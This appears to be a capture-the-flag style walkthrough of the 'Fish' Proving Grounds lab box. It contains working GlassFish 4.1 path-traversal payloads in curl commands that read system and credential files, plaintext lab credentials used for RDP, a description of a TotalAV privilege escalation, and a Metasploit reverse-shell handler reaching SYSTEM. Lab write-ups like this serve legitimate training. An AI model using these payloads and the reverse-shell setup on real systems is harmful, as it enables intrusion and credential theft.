Post cover image

June 16, 2026

Fish | Proving Grounds | OSCP Preparation

Box: Fish Community Rating: Hard

SilentExploit

11 min read

Start off with a quick nmap scan of the target:

┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln

Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-16 16:26 BST
Initiating Parallel DNS resolution of 1 host. at 16:26
Completed Parallel DNS resolution of 1 host. at 16:26, 0.02s elapsed
Initiating SYN Stealth Scan at 16:26
Scanning 192.168.238.168 [65535 ports]
Discovered open port 445/tcp on 192.168.238.168
Discovered open port 3389/tcp on 192.168.238.168
Discovered open port 135/tcp on 192.168.238.168
Discovered open port 8080/tcp on 192.168.238.168
Discovered open port 139/tcp on 192.168.238.168
Discovered open port 49669/tcp on 192.168.238.168
Discovered open port 6060/tcp on 192.168.238.168
Discovered open port 49716/tcp on 192.168.238.168
Discovered open port 49665/tcp on 192.168.238.168
Discovered open port 49666/tcp on 192.168.238.168
Discovered open port 8686/tcp on 192.168.238.168
Discovered open port 49664/tcp on 192.168.238.168
Discovered open port 3700/tcp on 192.168.238.168
Discovered open port 7680/tcp on 192.168.238.168
Discovered open port 7676/tcp on 192.168.238.168
Discovered open port 49667/tcp on 192.168.238.168
Discovered open port 8181/tcp on 192.168.238.168
Discovered open port 4848/tcp on 192.168.238.168
Discovered open port 49670/tcp on 192.168.238.168
Discovered open port 5040/tcp on 192.168.238.168
Completed SYN Stealth Scan at 16:26, 13.86s elapsed (65535 total ports)
Nmap scan report for 192.168.238.168
Host is up (0.042s latency).
Not shown: 58321 closed tcp ports (reset), 7194 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
3700/tcp  open  lrs-paging
4848/tcp  open  appserv-http
5040/tcp  open  unknown
6060/tcp  open  x11
7676/tcp  open  imqbrokerd
7680/tcp  open  pando-pub
8080/tcp  open  http-proxy
8181/tcp  open  intermapper
8686/tcp  open  sun-as-jmxrmi
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49716/tcp open  unknown

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds
           Raw packets sent: 90071 (3.963MB) | Rcvd: 58341 (2.334MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-16 16:26 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:26
Completed NSE at 16:26, 0.00s elapsed
Initiating NSE at 16:26
Completed NSE at 16:26, 0.00s elapsed
Initiating NSE at 16:26
Completed NSE at 16:26, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:26
Completed Parallel DNS resolution of 1 host. at 16:26, 0.02s elapsed
Initiating SYN Stealth Scan at 16:26
Scanning 192.168.238.168 [1000 ports]
Discovered open port 135/tcp on 192.168.238.168
Discovered open port 8080/tcp on 192.168.238.168
Discovered open port 445/tcp on 192.168.238.168
Discovered open port 3389/tcp on 192.168.238.168
Discovered open port 139/tcp on 192.168.238.168
Discovered open port 8181/tcp on 192.168.238.168
Discovered open port 7676/tcp on 192.168.238.168
Discovered open port 4848/tcp on 192.168.238.168
Completed SYN Stealth Scan at 16:26, 1.60s elapsed (1000 total ports)
Initiating Service scan at 16:26
Scanning 8 services on 192.168.238.168
Completed Service scan at 16:26, 23.79s elapsed (8 services on 1 host)
NSE: Script scanning 192.168.238.168.
Initiating NSE at 16:26
Completed NSE at 16:27, 8.62s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 1.48s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.01s elapsed
Nmap scan report for 192.168.238.168
Host is up (0.027s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE              VERSION
135/tcp  open  msrpc                Microsoft Windows RPC
139/tcp  open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fishyyy
| Issuer: commonName=Fishyyy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-28T14:22:03
| Not valid after:  2022-04-29T14:22:03
| MD5:   e6aa:9f17:f528:3bd0:e3e0:0cd1:52a5:1ae7
|_SHA-1: dd7f:2a71:abac:ea7f:198a:a320:f95d:e9b2:7e5e:8e4a
|_ssl-date: 2021-10-29T14:27:05+00:00; -4y230d01h00m04s from scanner time.
| rdp-ntlm-info:
|   Target_Name: FISHYYY
|   NetBIOS_Domain_Name: FISHYYY
|   NetBIOS_Computer_Name: FISHYYY
|   DNS_Domain_Name: Fishyyy
|   DNS_Computer_Name: Fishyyy
|   Product_Version: 10.0.19041
|_  System_Time: 2021-10-29T14:26:56+00:00
4848/tcp open  http                 Sun GlassFish Open Source Edition  4.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Login
|_http-server-header: GlassFish Server Open Source Edition  4.1
|_http-favicon: Unknown favicon MD5: EDABDF0241D12BB4AFF219C2B064486A
7676/tcp open  java-message-service Java Message Service 301
8080/tcp open  http                 Sun GlassFish Open Source Edition  4.1
|_http-server-header: GlassFish Server Open Source Edition  4.1
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_  Potentially risky methods: PUT DELETE TRACE
|_http-title: Data Web
8181/tcp open  ssl/http             Sun GlassFish Open Source Edition  4.1
|_http-server-header: GlassFish Server Open Source Edition  4.1
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Issuer: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2014-08-21T13:30:10
| Not valid after:  2024-08-18T13:30:10
| MD5:   594f:8111:2179:0c71:532a:00ab:223e:0e8a
|_SHA-1: 1ff8:eff1:b17d:c744:191e:213a:3102:9aa7:5982:a63c
|_ssl-date: TLS randomness does not represent time
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_  Potentially risky methods: PUT DELETE TRACE
|_http-title: Data Web
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2021-10-29T14:26:57
|_  start_date: N/A
|_clock-skew: mean: -1691d01h00m04s, deviation: 0s, median: -1691d01h00m04s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

NSE: Script Post-scanning.
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.10 seconds
           Raw packets sent: 1011 (44.484KB) | Rcvd: 1000 (40.032KB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-16 16:27 BST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:27
Completed NSE at 16:27, 10.03s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating Ping Scan at 16:27
Scanning 192.168.238.168 [4 ports]
Completed Ping Scan at 16:27, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:27
Completed Parallel DNS resolution of 1 host. at 16:27, 0.01s elapsed
Initiating SYN Stealth Scan at 16:27
Scanning 192.168.238.168 [1000 ports]
Discovered open port 139/tcp on 192.168.238.168
Discovered open port 8080/tcp on 192.168.238.168
Discovered open port 445/tcp on 192.168.238.168
Discovered open port 3389/tcp on 192.168.238.168
Discovered open port 135/tcp on 192.168.238.168
Discovered open port 8181/tcp on 192.168.238.168
Discovered open port 7676/tcp on 192.168.238.168
Discovered open port 4848/tcp on 192.168.238.168
Completed SYN Stealth Scan at 16:27, 1.53s elapsed (1000 total ports)
NSE: Script scanning 192.168.238.168.
Initiating NSE at 16:27
Completed NSE at 16:28, 46.55s elapsed
Initiating NSE at 16:28
Completed NSE at 16:28, 0.21s elapsed
Nmap scan report for 192.168.238.168
Host is up (0.027s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
4848/tcp open  appserv-http
7676/tcp open  imqbrokerd
8080/tcp open  http-proxy
|_http-iis-webdav-vuln: WebDAV is DISABLED. Server is not currently vulnerable.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
|_/index.php source code:
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum:
|   /sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml: Possible path traversal in VMWare (CVE-2009-3733)
|   /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml: Possible path traversal in VMWare (CVE-2009-3733)
|   /../../../../../../../../../../etc/passwd: Possible path traversal in URI
|   /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_  ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb: Possible iPhone/iPod/iPad generic file sharing app Directory Traversal (iOS)
8181/tcp open  intermapper
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

NSE: Script Post-scanning.
Initiating NSE at 16:28
Completed NSE at 16:28, 0.00s elapsed
Initiating NSE at 16:28
Completed NSE at 16:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 58.73 seconds
           Raw packets sent: 1010 (44.416KB) | Rcvd: 1001 (40.060KB)

I spent some time going through SMB and RPC to probe for potential weaknesses.

Once this wrapped up I moved onto manually enumerating the ports / services.

Port 4848

None

Sun GlassFish Open Source Edition 4.1. This is basically an open-source, production-ready Java EE 7 application server running on the target. The fact that we have a login form for it was a smoking gun.

I tried common default credentials and had some attempts brute forcing here but had no success.

Searchsploit then revealed that we have Directory Traversal vulnerabilities in this exact version:

┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# searchsploit 'Oracle GlassFish'
-------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------------
Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)              | linux/webapps/45198.rb
Oracle GlassFish Server - Administration Console Authentication Byp | windows/webapps/17276.txt
Oracle GlassFish Server - REST Cross-Site Request Forgery           | windows/webapps/18766.txt
Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resourc | multiple/remote/38802.txt
Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scri | windows/webapps/18764.txt
Oracle GlassFish Server 4.1 - Directory Traversal                   | multiple/webapps/39441.txt
Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (M | windows/webapps/45196.rb
Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (M | windows/webapps/45196.rb
Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scri | jsp/webapps/17551.txt
Sun/Oracle GlassFish Server - (Authenticated) Code Execution (Metas | jsp/webapps/17615.rb
-------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Grab a copy of the traversal PoC and you'll see it contains clear instruction on how to perform the attack as to how to read any file on the target:

┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# searchsploit -m multiple/webapps/39441.txt
  Exploit: Oracle GlassFish Server 4.1 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/39441
     Path: /usr/share/exploitdb/exploits/multiple/webapps/39441.txt
    Codes: CVE-2017-1000028
 Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /run/media/user/2024/HTBox/fish/39441.txt

┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# cat 39441.txt
Trustwave SpiderLabs Security Advisory TWSL2015-016:
Path Traversal in Oracle GlassFish Server Open Source Edition

Published: 08/27/2015
Version: 1.0

Vendor: Oracle Corporation (Project sponsored by Oracle)
Product: GlassFish Server Open Source Edition
Version affected:  4.1 and prior versions

Product description:
Built using the GlassFish Server Open Source Edition, Oracle GlassFish
Server delivers a flexible, lightweight and extensible Java EE 6 platform.
It provides a small footprint, fully featured Java EE application server
that is completely supported for commercial deployment and is available as
a standalone offering.

The Administration Console of Oracle GlassFish Server, which is listening
by default on port 4848/TCP, is prone to a directory traversal
vulnerability. This vulnerability can be exploited by remote attackers to
access sensitive data on the server being authenticated.

<SNIP>

Example:

REQUEST
========
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

This attack specifically targets port 4848/tcp (which we know is open and running the service as per our nmap scan). So, I went ahead and tested the vulnerability to target /windows/win.ini

┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# curl http://$target:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini --path-as-is
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Now, I targeted specific files in the Glassfish configuration that may contain credentials / passwords. The admin key file was suggested as a potential avenue so I went ahead and retrieved it :

┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# curl http://$target:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afglassfish4/glassfish/domains/domain1/config/admin-keyfile --path-as-is
admin;{SSHA256}aLatQQ3qEJHinsX4N/+V/45mJwFSkXN5w7vz3P6kHy4jrX+U7hXCkQ==;asadmin

This confirms that the username is admin BUT I was unable to make any headway with cracking the hash.

I will say that if you're in a scenario where you have a directory traversal vulnerability but can't seem to make headway: pivot to other services running on the target as they may also have configuration files containing passwords.

Port 6060

SynaMan 5.1 (Synametrics File Manager) is an on-premises, secure file-sharing and remote access platform. It allows users to share large files, map drives and access local files from any web browser or mobile device without needing complicated a web server setup.

None

Where does SynaMan store plain text credentials ?

None

Use your traversal ability to grab this file

None

Here you can see you have a smtpPassword (KingOfAtlantis) and a smtpUser (Arthur).

Netexec confirms these credentials are valid for RDP (note: just because credentials show as successful for RDP doesn't mean they will work — netexec is just 'knocking the door' to let you know whether the creds are valid):

┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# nxc rdp $target -u arthur -p KingOfAtlantis
RDP         192.168.170.168 3389   FISHYYY          [*] Windows 10 or Windows Server 2016 Build 19041 (name:FISHYYY) (domain:Fishyyy) (nla:False)
RDP         192.168.170.168 3389   FISHYYY          [+] Fishyyy\arthur:KingOfAtlantis (Pwn3d!)

Privilege Escalation

With shell access as Arthur we can get straight to work enumerating the desktop via RDP.

┌──(venv)─(root㉿user)-[/home/user/Downloads/dirsearch]
└─# xfreerdp3 /v:192.168.170.168 /u:arthur /p:'KingOfAtlantis' /cert:ignore /dynamic-resolution /drive:tools,/run/media/user/2024/HTBox/tools

Onced in, you should see a window for TotalAV pops up. This is is a comprehensive antivirus and digital security suite designed to protect devices against malware, ransomware, and phishing attacks — just like McAfee, Norton etc.

I then navigated to the application directory and checked the contents of the binary application to confirm the version and saw we have 4.14.31.0

None

CVE-2019–18194

This exploit leverages a local privilege escalation flaw in this exact version of TotalAV. It works bu purposefully forcing the antivirus to quarantine a specific malicious file. By using an NTFS directory junction, we manipulates the application's restore mechanism to redirect the quarantined file into a restricted directory, allowing them to execute code with elevated system permissions.

There is a tutorial video on how to carry out the exact exploit here

As the video provides clear guidance I chose not to replicate the contents exactly i.e. there's already a step by step BUT I once you get the very end of the process and need to trigger a restart to trigger the malicious dll; you won't have the option to click 'restart' to in the start menu.

To restart the machine; simply use Powershell's built in restart cmdlet to reboot and you should receive your shell shortly.

None 
┌──(root㉿user)-[/home/user]
└─# msfconsole -q
msf > use /exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.45.180
LHOST => 192.168.45.180
msf exploit(multi/handler) > show options

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted:
                                        '', seh, thread, process,
                                        none)
   LHOST     192.168.45.180   yes       The listen address (an int
                                        erface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.45.180:4444
[*] Sending stage (188998 bytes) to 192.168.238.168
[*] Meterpreter session 1 opened (192.168.45.180:4444 -> 192.168.238.168:49708) at 2026-06-16 16:22:12 +0100

meterpreter > shell
Process 4896 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system